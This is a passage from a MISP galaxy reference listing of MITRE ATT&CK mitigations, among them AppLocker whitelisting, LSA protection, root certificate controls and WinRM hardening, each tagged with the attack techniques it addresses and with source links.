https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Window Discovery Mitigation - T1010

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Application Window Discovery Mitigation - T1010"

View relationships graph

Application Window Discovery Mitigation - T1010 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 4108. Table References
Links
https://attack.mitre.org/mitigations/T1010
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Behavior Prevention on Endpoint - M1040

Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.

The tag is: misp-galaxy:mitre-course-of-action="Behavior Prevention on Endpoint - M1040"

View relationships graph

Behavior Prevention on Endpoint - M1040 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VDSO Hijacking - T1055.014" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"

Table 4109. Table References
Links
https://attack.mitre.org/mitigations/M1040

Winlogon Helper DLL Mitigation - T1004

Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="Winlogon Helper DLL Mitigation - T1004"

View relationships graph

Winlogon Helper DLL Mitigation - T1004 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

Table 4110. Table References
Links
https://attack.mitre.org/mitigations/T1004
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Compile After Delivery Mitigation - T1500

This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Compile After Delivery Mitigation - T1500"

View relationships graph

Compile After Delivery Mitigation - T1500 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500" with estimative-language:likelihood-probability="almost-certain"

Table 4111. Table References
Links
https://attack.mitre.org/mitigations/T1500
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Use Recent OS Version - M1006

New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.

The tag is: misp-galaxy:mitre-course-of-action="Use Recent OS Version - M1006"

View relationships graph

Use Recent OS Version - M1006 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"

Table 4112. Table References
Links
https://attack.mitre.org/mitigations/M1006

System Service Discovery Mitigation - T1007

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Service Discovery Mitigation - T1007"

View relationships graph

System Service Discovery Mitigation - T1007 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 4113. Table References
Links
https://attack.mitre.org/mitigations/T1007
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Taint Shared Content Mitigation - T1080

Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).

Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.

Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Taint Shared Content Mitigation - T1080"

View relationships graph

Taint Shared Content Mitigation - T1080 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 4114. Table References
Links
https://attack.mitre.org/mitigations/T1080
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Security Support Provider Mitigation - T1101

Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Security Support Provider Mitigation - T1101"

View relationships graph

Security Support Provider Mitigation - T1101 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101" with estimative-language:likelihood-probability="almost-certain"

Table 4115. Table References
Links
https://attack.mitre.org/mitigations/T1101
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery Mitigation - T1120

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Peripheral Device Discovery Mitigation - T1120"

View relationships graph

Peripheral Device Discovery Mitigation - T1120 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 4116. Table References
Links
https://attack.mitre.org/mitigations/T1120
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Password Policy Discovery Mitigation - T1201

Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network. (Citation: Microsoft Password Complexity)

The tag is: misp-galaxy:mitre-course-of-action="Password Policy Discovery Mitigation - T1201"

View relationships graph

Password Policy Discovery Mitigation - T1201 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 4117. Table References
Links
https://attack.mitre.org/mitigations/T1201
https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

Install Root Certificate Mitigation - T1130

HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)

Windows Group Policy can be used to manage root certificates and the <code>Flags</code> value of <code>HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots</code> can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)

The tag is: misp-galaxy:mitre-course-of-action="Install Root Certificate Mitigation - T1130"

View relationships graph

Install Root Certificate Mitigation - T1130 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"

Table 4118. Table References
Links
https://attack.mitre.org/mitigations/T1130
https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

Modify Existing Service Mitigation - T1031

Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)

The tag is: misp-galaxy:mitre-course-of-action="Modify Existing Service Mitigation - T1031"

View relationships graph

Modify Existing Service Mitigation - T1031 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"

Table 4119. Table References
Links
https://attack.mitre.org/mitigations/T1031
https://github.com/mattifestation/PowerSploit
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Remote File Copy Mitigation - T1105

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Remote File Copy Mitigation - T1105"

View relationships graph

Remote File Copy Mitigation - T1105 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4120. Table References
Links
https://attack.mitre.org/mitigations/T1105
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Graphical User Interface Mitigation - T1061

Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Graphical User Interface Mitigation - T1061"

View relationships graph

Graphical User Interface Mitigation - T1061 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061" with estimative-language:likelihood-probability="almost-certain"

Table 4121. Table References
Links
https://attack.mitre.org/mitigations/T1061
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Deployment Software Mitigation - T1017

Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Application Deployment Software Mitigation - T1017"

View relationships graph

Application Deployment Software Mitigation - T1017 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"

Table 4122. Table References
Links
https://attack.mitre.org/mitigations/T1017

Credentials in Files Mitigation - T1081

Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Files Mitigation - T1081"

View relationships graph

Credentials in Files Mitigation - T1081 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 4123. Table References
Links
https://attack.mitre.org/mitigations/T1081
http://support.microsoft.com/kb/2962486

Remote System Discovery Mitigation - T1018

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Remote System Discovery Mitigation - T1018"

View relationships graph

Remote System Discovery Mitigation - T1018 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 4124. Table References
Links
https://attack.mitre.org/mitigations/T1018
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Indirect Command Execution Mitigation - T1202

Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)

The tag is: misp-galaxy:mitre-course-of-action="Indirect Command Execution Mitigation - T1202"

View relationships graph

Indirect Command Execution Mitigation - T1202 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 4125. Table References
Links
https://attack.mitre.org/mitigations/T1202
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx
https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

XSL Script Processing Mitigation - T1220

[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and/or msxsl.exe may or may not be used within a given environment. Disabling WMI may cause system instability and should be evaluated to assess the impact to a network. If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="XSL Script Processing Mitigation - T1220"

View relationships graph

XSL Script Processing Mitigation - T1220 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 4126. Table References
Links
https://attack.mitre.org/mitigations/T1220

Standard Cryptographic Protocol Mitigation - T1032

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Cryptographic Protocol Mitigation - T1032"

View relationships graph

Standard Cryptographic Protocol Mitigation - T1032 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 4127. Table References
Links
https://attack.mitre.org/mitigations/T1032
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Custom Cryptographic Protocol Mitigation - T1024

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Cryptographic Protocol Mitigation - T1024"

View relationships graph

Custom Cryptographic Protocol Mitigation - T1024 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 4128. Table References
Links
https://attack.mitre.org/mitigations/T1024
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

System Information Discovery Mitigation - T1082

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Information Discovery Mitigation - T1082"

View relationships graph

System Information Discovery Mitigation - T1082 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4129. Table References
Links
https://attack.mitre.org/mitigations/T1082
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Remote Management Mitigation - T1028

Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-course-of-action="Windows Remote Management Mitigation - T1028"

View relationships graph

Windows Remote Management Mitigation - T1028 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"

Table 4130. Table References
Links
https://attack.mitre.org/mitigations/T1028
https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Commonly Used Port Mitigation - T1043

The tag is: misp-galaxy:mitre-course-of-action="Commonly Used Port Mitigation - T1043"

View relationships graph

Commonly Used Port Mitigation - T1043 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4131. Table References
Links
https://attack.mitre.org/mitigations/T1043
